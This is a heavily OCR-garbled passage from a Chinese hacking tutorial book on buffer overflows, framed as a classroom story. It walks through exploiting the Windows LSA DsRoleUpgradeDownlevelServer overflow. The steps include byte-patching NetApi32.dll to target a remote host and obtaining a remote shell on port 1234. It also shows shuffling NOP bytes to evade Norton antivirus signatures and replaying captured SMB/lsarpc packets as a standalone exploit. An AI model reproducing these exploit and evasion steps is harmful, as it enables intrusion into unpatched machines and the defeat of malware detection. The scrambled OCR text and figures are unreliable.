"RET 4=POP EIP, ADD ESP，4。 首 先 POP EIP， 那 么 EIP 交 成 0xX41414141， 而 ESP 十 4 二 


00BBFD54 十 4 三 00BBFD58 ; 冉 ADD ESP, 4=ESP+4=00BBFD58 t 4 — 00BBFD5C, 


“所 以 返回 后 ，EIP= 二 41414141， 


ESP=00BBFD5C, 


7.3.2 1DA 帮 助 分 析 warFTP 漏 洞 


果然 验证 了 我 们 的 分 析 ， 如 图 7 一 39。 
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Q 有 版 缓冲 区 浴 出 教程 


БЕ ЕЕ ЕЕН 


aaBBF AAG 
‚ FFFEB3BA 


EX арававав 
Ө@ВБЕП5С 


> pƏBBFDB4 
I ггЕБГБІЙ 
, BDBBFE6S 


41414141 


ES 0023 
CS BBHIEB 
55 айга 
DS 080823 
FS 0038 
55 OBAH 


LastErr 


. 88608212 


» empty 
empty 
"^ empty 


“小 结 一 下 ， 浴 出 是 因为 执行 了 sprintf (eax,"96s","[] AAAAAAAAAA") 
部 变量 ， 而 sprintf 没 有 验证 字符 串 的 长 度 ， 所 以 就 发 生 浴 出 了 1” 


ASCII "AAAAAAA contr 
kernel32.GetTickCount 


debit 
32bit 
32bit 
32bit 
32bit 
HULL 


FFDD8808( FFF) 


ERROR SUCCESS (OGAOGA 
(NO, NB, NE, R, NS, PO, GE, ( 
D empty 9.7891092981757173768e-44 
[1 empty 6.558034145633548697680e-44 
empty 3.3781756871888892168e-4 

| empty 2.3514276321239214888e-1: 
empty 1.02582269828751582368&-1 


йй 
Ba 
3218 ESF 
4889 Cond 18 88 Err B B B £ 
ИЛК Prec HEHR,53 Mask 1 





7.3.2 IDA 儿 助 分 析 warFTP 漏 洞 


。 这 里 ，eax 是 一 个 局 
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7.3.8 黑 日 结合 ，LSA 漏 洞 的 分 析 利 用 

“一气呵成 ! 不 类 不 觉 中 融 把 漏洞 找 了 出 来 ，" 宇 强 感 叹 道 。 

“呵呵 ! 最 后 来 一 个 高 难度 的 吧 ! LSA 的 远程 浴 出 漏洞 分 析 利 用 。 这 融 需 要 黑白 法 结合 了 。” 
“和 首先 看 看 本 地 浴 出 ， 这 个 比较 简单 ， 图 7 一 40 里 的 代码 融 可 引发 本 地 浴 出 。 


HMODULE hNetapi = Loadlibrary("Nerapi32.d311"7) 


DsRoleUpgradeDownlevelServer = (DSRÜLEUPGRADEDOWNLEVELSERVER)GetProcAddress(hNetapi, 
"DsRoleUpgradeDownlevelServer"); 


DsRoleUpgradeDownlevelServer( 
(unsigned longje&but[0U], (unsigned long)je&but2[0], (unsigned long)esbutz[U], 
(unsigned long)e&buf£Z[0], (unsigned long)sbufzZ[0], (unsigned long)s&bufz[0], 
(unsigned long)jebufz[0], (unsigned long)&bufz[0], (unsigned long)sbufa2[0], 
[unsigned long)e&buf2[0], (unsigned long)s&buf2[0], (unsigned long)sbuf2[0]);: 


“BHR x А S A Netapi32.dll fX $llIDsRolepEncryptPasswordStartEg2Z&K, KF 2.47325 04, 
KAWE- PAGS К, mim. НЯ Z ? n, еи 倒计时 1 分 钟 
后 就 重启 。: 


“ 哦 ! 和 震荡 波 的 效果 一 样 啊 1 
“只 能 等 它 重启 ， 没 有 办 法 了 吗 ?， 


“大 家 在 运行 程序 里 输入 shutdown -a ， 可 以 终止 系统 关机 。Shutdown 命 令 的 帮助 如 图 7- 
41, " 


Microsoft Windows AP TUE 5.1.2600 1 
¿G> BhR3VPHA 1985-2001 Microsoft Corp. 


Gshutdown 7? 
HJE: shutdoun [—i í 一 上 í — í — š —al [-—-F] [—m "sscomputemnamel] [—-t xx] [—c " 
mment"] [—d up:i:xx:uul 


没有 参数 X REGIHECTS ? 相同 
ҮТЕН BE Жср Im | | 
- M 


* vc omput ername 
Xx 


"comment '' 


的 X BITS | | 
要 原因 代码 (小 于 256 HERO 
ЖАДИК, F 65536 ЁЧЕЖ#› 





“因为 可 以 直接 用 DsRolepEncryptPasswordStart 函 数 引 发 本 地 异常 ， 所 以 本 地 漏洞 利用 比较 
简单 ， 大 家 用 Ollydbg 加 载 Isass.exe 进 程 ， 然 后 填充 buf 用 定位 大 法 ， 就 可 轻松 实现 定位 和 利 
用 ! 大 家 都 应 该 很 清楚 了 吧 ， 这 个 作为 替 假 作业 ， 大 家 上 自己 跟 入 分 析 一 下 。” 


大 家 纷纷 埋头 记 下 来 。 


££ 


7 
| 








感 >= 


“91701 2 FHÉgNetapi32.dllF ÉSDsRoleUpgradeDownlevelServerPqZ/ EET P 5, ЖИП 
Le ИУ KB So EBR AmE LSASRV.dllFRÉDsRolerUpgradeDownlevelServer? 4438 ! 3x 
=, РЧ НІНЕ — “г, Кя КА А РЕВ 7 


“BR 5-р 7 ТУ OK Е 1, ЖЕЗ, ХАА Ж s BT ЕЛЕЕ Т E Р mAAR [Е 18241, A 

k, MURTRIR, ЛААЛ, ЖАЛ. АЅВ№.а ААБ 25-25: 0 АА EB ШЇ, s НН 9, je] Eñ ЕН 

Bo ” 

“好 ， 现 在 我 们 的 目标 就 是 要 给 远程 机 器 发 送 请 求 ! BR) Г, MTE E [М tE T 
只 能 向 本 机 发 请 求 ， 那 怎么 办 呢 ? ” 


“是 啊 ! 不 好 办 啊 1 PR LIB. 


其实， 平时 我 们 使 用 修改 后 的 东西 也 多 了 ; 要 注册 码 ， 我 们 融 破 解 注册 码 ; 211 88, RNT 
破解 过 期 补丁 。 所 以 ， "ш ж Sc ЖЕН) Р 05 — F, Жыл [= ЖЛ, AR ;5 Ж, 
也 能 向 远程 主机 发 请 求 。 


“真正 的 黑客 精神 ， 融 是 不 断 的 深入 研究 技术 ， 大 胆 创 新 ， 发 扬 共 平 精 伸 。” 





Ур ] J nx By ИЛЕ 
FL 4 7 | ап FATE 


“我 们 用 IDA 反 编译 NetApi32.dll。 好 ， 结 束 后 ， 用 名 字 找 到 DsRoleUpgradeDownlevelServer() 
的 地 方 。 如 图 7 一 42。 





Car - Ei study gt 9 Bri tougaoshackertrackSniffer£e ë WIFE NETAPI3Z.DLL 
File Edi Jump Search View Options Windows Help 


|= ыЫы||=---|}#ҺҺ&зГ« X: alal onele 


1а &ejmnvw-js*eelerT|if£55kj9 p куат n 加 zle п x | m e 


|A ва em om om ss. = N x |%W-#-" SM Kio sos # ш |& АЧА Ж 


[3] IDA View | = Нек View | N Names | *8 Functions | Ң Structures | Еп Enums | gn ШОТ 


BiDAview-A — —. »IBl xi 
Ls 





.text:7513D5f6 
.ktext:7513D5h86 ; Attributes: bp-based frame 


„Бех: 75130586 

„Сех: 751305846 public DsRoleUpgradeDownleuelSeruer 
.Lextz:/513D5Rhó6 DsHRoleUpgradeDownleuelSeruer proc near 
.Ltext:/513D5fh6 


-text-7/513D5hn6 uar 35h 
.text:7513D5hó6 var 38 


dvord ptr -34h 
duord ptr -38h 


.Ltext:7513D5nó var 2€ = dword ptr -2Ch Jj х] 
.text:7513D5hH6 var 28 = dword ptr -28h m 
.Ltext:7513D5Ró6 uar 24 = (word ptr -24h 

.text:7513D586 var 28 = dword ptr -20h ES 
.text:7513D566 var 1С - dword ptr -1Ch B7] 
.-text:/513D5hó6 var 18 - dword ptr -18h | 87 
„сех: #51305А6б var 18 - dword ptr -18h | BAS 
.text:/513D5hn6 var 4 = dword | + 











You may start to explore the Input file right пом, 
propagating type information. 

Function argument information. is propagated 

The initial autoanalysis 15 finished. 


command "Jump&ásk" failed Additional n display: 
АШ: idle Down Disk:5GB (D003C9A6  — 7513D546: DsR eBerver 


“好 ， 从 画 数 开 始 的 地 方 ， 往 下 走 一 点 点 ， 代 码 如 下 :” 


-| Bl Regula function | 
Bl Instruction ] 








.text:7513D5F7 8D 45 CC lea eax, [ebp-var 34] 

.text:7513D5FA 50 push eax 

.text:7513D5FB 6A 00 push 0 

.text:7513D5FD E8 OF 05 00 00 call DsRolepEncryptPasswordStartQ24 ; 


“在 IDA 中 ， 默 认 是 不 显示 机 器 码 的 ， 在 'Options 一 General 一 Disassembly' 页 面 中 ， 有 Number 
of opcode bytes， 上 默认 是 0， 我 们 把 它 改 成 6 或 8 就 行 了 。 如 图 7 一 43。” 


= A A DEI r , 1) AN A SsED S 
77070 р, Z | Q A `В 
== | ^i = 
„МУ улууу eH Z= 9 | IRN 


= Ч nRa 
让 RI Уп] ВА) № Т? 不 уН H H DO d 


Car - Ei study, dt 9 BE tougaoshackertCrackSniffer£s = XHIFH ww NETAPI32.DLL E E -|| x| 





File Edit Jump Search View Options Windows Help 





Бы е - -h SO 1 Пе >]! >J £ = + x |a =m >= E 
а #||н sa e +T Z A A|] m mmi x! v DE x| pn x Im m ж 
[e m| e e N xi SM Kom J|: г Ји š & A E 


[Z] IDA View-A | 1] HexView| N Names | Ye Functions | =" Strings | Ë Structures | En Enums | 
























Ei IDA view-A Е 
.-text:/513D5E^ 8D 7D 08 edi, [ebp+uar 28] 


.Ltext:/513D5E7 
.text:7513D5E8 
-text-7513D5EO9 | pax, [ebp+uar 28] 
.text:7513D5EC Pax 
.text:7513D5ED eax, [ebp*var 28] 
.text:7513D5F ü ! eax 
.Ltext:7513D5F 1 | eax, [ebp*var 16€] 
.Lext:7513D5Fh 5f | eax 
.text:/513D5F5 2 
.Lext :/513D5F 7? | eax, [ebp*var 394^] 
.text:/513D5Ffh Pax 
-text:7513D5FB ü | 
-Ltext:/513D5FD  DsRolepEncryptPasswordStartis25 | 
.text:7513D682 eax, eax | 
- сех: 751306 04 jnz short loc 75130650 
.text:7513D686 [ebp*var ú], рах 
.text:7513D689 F 1 | [ebp*+arg 2€] 
.Ltext:7513D6BC f [ebp*arg ра] 
n= 
Executing function ‘OnLoad’. à 
IDA js analysing сле input file. 
YOU may start to jore the input file right now. 


АШ: idle Down TUE n О003С АС 7513D60C: DsRolelpgradeDownlevelsServer-4-66 


“根据 eEye 的 文档 ， 那 里 融 是 我 们 要 修改 的 地 方 !1_DsRolepEncryptPasswordStart 函 数 的 第 一 
个 参数 就 是 主机 。 微 软 用 的 是 0， 即 为 空 ， 表 示 把 请 求 发 给 本 机 。 我 们 要 把 它 改 成 远程 主机 的 
地 址 就 OK 了 。” 


“ShellCode 的 是 DsRoleUpgradeDownlevelServer 的 参数 传 来 的 ; 那么 远程 主机 的 地 址 也 从 那 
里 传 来 吧 ! 用 DsRoleUpgradeDownlevelServer 函 数 的 第 九 个 参数 传 主机 地 址 ; 然后 作为 第 
个 参数 给 DsRolepEncryptPasswordStart。” 


“因为 前 面 第 九 个 参数 已 经 给 了 [ebp+var 十 34] 了 ， 我 们 把 [ebp+var 十 34] 的 内 容 压 人 就 行 了 。” 


“明白 了 思路 ， 现 在 改写 代码 。 注 意 ， 改 写 时 要 保证 字 节 个 数 和 原来 的 相同 ， “алта 
Ёк Y Kur e — 22 ж Н [ебрр+уаг+ 34], EtbByEL thu EA, PARAR EL IX ЖШ: 


50 push еах 

8B 45 CC mov eax, [ebp+var_34] 
50 push eax 

90 nop 


“这 样 融 把 存在 [ebp+var 34] 中 的 远程 主机 地 址 作为 第 一 个 参数 压 人 ; nop 是 什么 都 不 做 的 空 指 
邻 ， 目 的 只 是 为 了 保证 字 节 数 和 原来 的 相同 。” 


“好 ， 我 们 调 出 WinHex， 搜 索 至 我 们 要 修改 的 地 方 ， 作 图 7-44 的 的 修改 。” 


UUU3C3EU | 45 ро зз CO SD ?D D8 АБ АВ 8р 45 D8 50 8р 45 ED 
UDUU3C3FU | 50 SD 45 Ed 50 БА 02 50 SB 45 CC 50 90 ES ШЕ 05 
О0ООЗСАОО | 00 00 85 СО 75 4А 21 45 ЕС FF 75 34 FF 75 30 FF 


“ШШ, 29736227 ! 这 人 么 厉害 啊 ! "古风 发 现 道 。 
“我 们 等 会 再 来 考虑 这 个 问题 ， 先 把 诺 颊 头 把， 然后 LoadLibrary 我 们 改过 后 的 ww1NetApi.dl， 
并 把 第 九 个 参数 改 成 远程 主机 的 地 址 ， 即 NpNpc$ 的 Unicode 形式 。 指 定 远程 主机 的 IP 地 址 ， 
编译 执行 LSA1.cpp， 再 Telnet 远 程 主机 的 1234 端 口 。 ' 哟 ' ! 果然 连 上 了 我 们 要 攻击 的 远程 主 
机 。” 
“成 功 了 1 "大 家 欢呼 起 来 。 
“我 们 再 来 改进 改进 。 首 先 ， 玉 辛苦 苦 修 改 的 dll 会 被 查 杀 成 病毒 ， 那 么 就 要 想 办 法 让 杀毒 软件 
不 认识 1" 
“杀毒 软件 是 按照 文件 的 特征 码 来 识别 一 个 病毒 或 木马 的 。 我 们 只 是 在 正音 的 系统 文件 
NetApi32.dll 的 基础 上 改变 了 6 个 字 节 ， 其 他 完全 相同 ; 所 以 杀毒 软件 的 特征 码 一 定 是 判断 的 
这 6 个 字 节 | 那 我 们 融 把 这 六 个 字 节 稍微 改 一 下 ， 看 它 还 能 否 识别 1” 

“刚才 说 了 ，90 是 nop， 表 示 什 么 都 不 做 的 空 指令 ， 我 们 把 它 放 在 其 它 指 令 之 间 ， 如 图 7 一 45， 
和 指令 50 〈 即 汇编 PUSH EAX) 交换 一 下 位 置 。” 

0003C9E0 | 加 5 DO 33 CO 8D 7D D8 AB АВ 8D 45 D8 50 8D 45 ED 


UUU3C9FU | 50 Bb 45 ЕЗ SU БА 02 50 ƏB 45 CC ЧП 5U Ed Ur 05 
0003CA00 | 00 OD 85 СО 75 4А 21 45 FC FF 75 34 FF 75 30 FF 


“然后 保存 为 ww2NetApi.dll， 让 诺顿 再 扫 摘 看 看 。 了 呵呵 | 这 次 没 报警 了 。 其 实 ， 如 果 还 要 报 
警 ， 我 们 可 以 继续 修改 nop 位 置 ， 如 还 不 行 ， 还 可 改 成 mov ebx [] ， 再 push ebx 等 。 办 法 多 得 
很 呢 l” 

“不 会 被 查 杀 了 ， 看 看 效果 啊 ! 我 们 把 程序 改 为 读 ww2NetApi.dll， 届 运行， 还 是 成 功 了 1 如 图 
7—46. 


ал 





C:\>lsaall A 192.168.3.212 = 
shellcode size 484 
Ret value = 1727 


Microsoft uindowa ETT] T amas puas 5.0.2195 1 
¿G> AVYPTE 1985-2000 Hicrosoft Corp. 


"RS F:SWINHNHTSsuostem32)> 





© Serv. URII 
] tougao 
+ Í `1 hackerCrac ksniffe "| 


小 知识 : 特征 码 





现在 绝 大 多 数 杀 毒 软件 都 是 建立 在 “病毒 特征 码 " 基 础 上 的 。 有 新 病毒 出 现时 ， 厂 两 先 要 获得 病 
毒 的 一 个 样本 ， 提 取出 它 的 特征 码 ， 用 户 把 特征 码 加 入 到 病毒 库 中 才能 查 杀 。 如 果 我 们 测试 
出 了 杀毒 软件 的 判断 特征 码 ， рабина BR XETAOSE!MaT 


意义 上 来 说 ， 反 病毒 的 扩 术 需 个 革命 化 的 突破 | 

“在 此 ， 我 们 是 直接 物理 修改 了 NetApi32.dll， 就 像 破解 一 祥 ， — 其 实 ， 我 们 还 
可 在 内 存 里 动态 修改 ， 融 如 同 内 存 注册 机 一 样 ， 动 态 读 出 内 存 的 东西 ! 这 交 给 大 家 下 去 完 
成 吧 І” 


“现在 我 们 可 以 说 是 完美 的 实现 远程 洽 出 了 ， 但 带 有 一 个 300k 的 dll， 斌 想 震 荡 波 抑 着 这 个 dl 到 
处 跑 ， 也 太 难 为 它 了 吧 ! 所 以 我 们 就 把 dll 也 去 掉 ， 完 全 用 一 个 程序 实现 1” 


“j? 怎么 实现 呢 人 ?) 

“ 源 代 码 是 微软 控制 的 ， 一 般 人 都 看 不 到 。 当 然 ， 对 我 们 菜鸟 来 说 ， 即 使 有 了 源 代 码 ， 也 是 读 
不 懂 请 求 是 如 何 实现 的 ， 更 不 用 说 自己 写 一 个 请 求 了 。 

“所 以 黑 盒 法 出 场 了 1 本 机 向 远程 发 起 请 求 时 ， 一 定 会 通过 网 络 的 。 所 以 ， 我 们 可 把 远程 主机 
发 的 请 求 包 抓 下 来 ， 模 拟 客户 六 ， 向 服务 辣 发 送 这 样 的 网 络 包 束 可 以 了 ! 

“好 啊 ， 说 干 束 干 1 ”古风 打开 Ethereal 《光盘 有 收录 ) ， 再 对 远程 主机 攻击 一 次 ， 然 后 把 攻击 
发 送 的 包 抓 下 来 ， 如 图 7 一 47。 


Gisa attak He 





: Statistics 


Hn 





mi Ма OTt [Bm ET; mm ACK L] L 
1108 > microsoft-ds [ACK] lumuy Eel ел] tr 


ena ETT 


二 上 | Х| 


a LE 
IEE 168.1.169 js 
192.168.1.169 SMB Negotiate Protocol Request 
192.168.1.166 SMB Negotiate Protocol Response 
192.168.1.169 SMB session setup Andx Request, NTLMSSP_NEGOTIATE 
192.168.1.166 SMB session Setup Andx Response, NTLMSSP_CHALLENGE, Error: STATUS M 
192.168.1.169 SMB Session setup Andx Request, NTLMSSP_AUTH 
192.168.1.166 SMB session setup Andx Response 
192.168.1.169 SMB Tree Connect Andx Request, Path: *192.168.1.169IPC$ 
192.168.1.166 SMB Tree Connect Andx Response 
192.168.1.169 ТСР 1108 > microsoft-ds [АСК] 5е0=648 Ack=610 win=16911 1 еп=0 
192.168.1.169 SMB NT Create Andx Request, Path: *lsarpc 
192.168.1.166 SMB NT Create Andx Response, FID: 0х4000 
192.168.1.169 DCERPC Bind: call id: 1 UUID: 15А DS 
192.168.1.166 DCERPC . Bind ack: call id: 1 accept max xmit: 4280 max recv: 4280 
192.168.1.169 LSA_DS Unknown?! request [DCE/RPC first fragment] 
152.168.1.169 TCP [Continuation to £20] 1108 > microsoft-ds [АСК] seq= =2372 Ack=87 
"= = = > Ps Гло РЕНН E u... .. ........ ДРЕ m == = T 3а sq uua a кен. m. s mi ss 28 =l = F. == = ri om 


A 一 


Th тата тч = 














El Frame 4 (62 bytes on wire, 62 bytes captured) 
[] Ethernet II, src: 00: 50:ba:eb:5h:63, Dst: 52:54:ab:27:b3:h2 


FT "imam am cm onm шай — HUS om amaña um m oum Ñ — 09 um ы 8 x= lala a #1 PS d utm A n em а dam а m аа эл PIS = 





um uma mim amaña am mo mm | 





оббо 52 54 ab 27 b3 b2 00 50 pa ер 5b 63 08 00 45 00 RT. ...P ..[C..E. 
0010 00 30 00 5f 40 00 80 06 75 c8 cO ав Ol a9 cQ a8 40.258... Mu a a a. 
0020 01 аб 01 bd 04 54 bd 50 аз 91 ef 04 16 14 7012  ..... TP aanas p. 
0030 fa fO 97 72 QQ QQ Q2 O4 05 b4 01 01 04 02 al asas авнаа 


IA. 4 = El 


Filter: | /| aa Expression.. | clear| арр || File: Isa attack 219 КВ 000001 екы 654 D: 654 М: C 


“192.168.1.166 是 攻击 机 ，192.168.1.169 的 被 攻击 的 服务 机 。192.168.1.166 先 是 TCP 三 次 握 


手 ， 然 后 建立 空 连 接 ， 图 7 一 47 里 NT Create Andx Request, Path:\lsarpc 那 排 是 关键 ! 那 就 
一 定 的 请 求 ， 然 后 把 我 们 的 超 长 参数 发 过 去 。 

“但 我 们 不 用 具体 了 解 它 的 含义 ， 只 管 把 请 求 拷贝 下 来 存在 数组 中 ， 直 接 向 远程 机 器 发 送 就 是 

fo^ 


这 次 运行 我 们 的 LSA2.cpp， 又 成 功 了 ， 它 可 是 不 带 dll 的 哦 1” 


“J | » 
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Eile, RRRA, п) л) £ R 2 а Д Y ! 而 且 这 种 方法 分 析 
微软 未 文档 化 的 东西 《特别 是 RPC 相 天 的 东西 ) ， 那 更 是 相当 有 用 !” 


尾声 


“ 老 炳 ， 好 像 LSA 这 样 的 网 络 通信 也 很 有 意思 | 和 Socket 好 像 不 一 样 ， 讲 讲 它们 的 实现 吧 ! "h 
风 说 道 。 

“呵呵 ， 快 放假 了 ， 大 家 也 要 进入 期 末 考 斌 了。 估计 也 不 能 投入 太 多 时 间 来 进行 实际 思考 ， 更 
别提 实践 和 演练 了 。 而 这 门 课 ， 只 懂得 原理 是 远 远 不 够 的 ， 实 践 机 是 关键 。 所 以 我 打算 布置 
一 下 寒假 作业 。” 老 病 说 道 。 


同学 们 都 拿 起 笔 ， 听 老病 布置 作业 。 


“第 一 道 题 束 是 上 节 课 说 的 ， 利 用 寒假 时 间 通 过 查阅 网 上 的 相关 资料 ， 用 高 级 语言 实现 一 个 找 
出 已 有 Socket， 并 利用 它 传输 数据 的 程序 ， 用 于 穿 透 防火 墙 1 


“代码 还 能 够 执行 远程 传输 过 来 的 命令 ， 最 后 再 把 它 提取 成 我 们 的 ShellCode。 ”老病 接着 说 
3B. 


"Hx, MERI АВЕ "ЕШ УША 5, 


“第 二 道 题 : 分 析 一 个 假期 中 出 现 的 新 漏洞 。 当 然 ， 如 果 你 们 能 目 己 发 现 新 漏洞 ， 当 然 更 好 
(在 CVE 留 下 自己 的 名 字 吧 ) ! 下 学 期 开学 后 我 们 进行 评 讲 ， 然 后 进一步 深入 各 种 漏洞 ， 包 
括 格 式 化 浴 出 、 静 态 浴 出 、VC 虚 函数 浴 出 、Linux 环 境 下 浴 出 等 ， 还 会 涉及 到 其 他 方面 的 内 
容 ! 到 时 看 校长 大 人 土豆 以 及 学 校 的 安排 吧 ! 这 学 期 的 课 就 到 这 里 。 大 家 好 好 复习 ， 准 各 考 
j& 1 AZN, Br! 希望 大 家 过 个 好 年 1” 


宇 强 和 小 依 来 到 教室 外 面 .….….…. 

ХР РЕГ 467, RR% К, AMPARERA. ZER, ЕУ – ERR 
在 南方 ， 下 雪 极 不 易 啊 ! 

平安 夜 ， 我 们 去 天 府 广场 听 钟 声 吧 ?” 

“好 啊 ! ” 

不 知 何 时 ， 两 人 的 手 替 在 了 一 起 ; 两 颗 心 ， 是 如 此 的 温暖 和 接近 。 


在 论坛 上 看 到 很 多 初学 缓冲 区 渝 出 的 人 ， 他 们 有 看 很 高 的 学 习 激 情 和 渴 望 ; 也 有 更 多 的 人 过 
切 希 望 进行 缓冲 区 浴 出 的 学 习 ， 但 限于 基础 ， 对 大 量 精 妙 但 又 复杂 的 资料 让 他 们 望 而 止 步 。 


帮 他 们 解决 问题 时 ， 似 乎 看 到 了 当时 的 自己 一 勤奋、 努力， 但 缺乏 系统 和 详细 指导 的 资 
料 ， 不 得 不 一 次 又 一 次 的 搜索 Google ; 一 次 又 一 次 的 发 问 。 


目 己 和 萤 为 在 Google 的 30 多 页 里 找到 一 个 调试 扩 巧 而 欢心 鼓舞 ; 也 便 为 一 个 问题 ， 钻 研 了 半 个 
多 月 也 没有 解决 。 
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在 土豆 的 大 力 支持 下 ， 我 根据 自己 学 习 、 利 用 缓冲 区 浴 出 漏洞 的 经 验 ， 用 简单 、 通 俗 的 语言 
写 出 来 了 就 是 这 本 以 校园 生活 为 背景 的 《Q 版 黑客 缓冲 区 瀹 出 教程 》。 


写作 过 程 是 漫长 的 ， 要 久 理 的 事情 是 烦 瑛 的 。 当 终于 坚持 下 来 正 ?X 痉 | |9 式 搁 笔 时 ， 一 种 如 
+ ЕВ ў 的 感 ХА 觉 油 然 而 生 ЖЕЗГЕ 


在 此 ， 我 要 特别 感谢 土豆 ， 和 他 一 起 策划 、 一 起 构思 的 日 子 ， 让 我 学 到 了 很 多 东西 。 


要 感谢 我 的 导 症 方 勇 副教授 ， 在 他 支持 下 ， 我 地 有 能 力 和 勇气 提起 笔 来 完成 这 样 的 尝试 ， 
并 在 他 的 精心 帮助 、 指 导 下 ， 知 道 了 如 何 成 融 一 本 第 二 符合 规范 的 书 。 


谢谢 张 微 ， 帮 有 我 精心 整理 了 每 幅 图 片 ， 我 和 古风 不 一 样 ， 我 不 喜欢 重复 性 的 劳动 ……… 


在 写本 书 的 最 后 部 分 时 ， 目 己 的 心脏 出 现 了 点 小 case， 非 剃 感谢 我 的 父母 ， 在 他 们 的 精心 照 
顾 下 ， 目 己 终于 在 病床 上 完成 了 最 后 一 章 和 后 序 。 


最 后 ， 感 谢 你 ! 对 ! 融 是 正在 看 这 本 书 的 你 ! 你 的 支持 、 你 的 进步 ， 才 是 我 所 笔 写 作 的 最 大 
动力 。 


XH 
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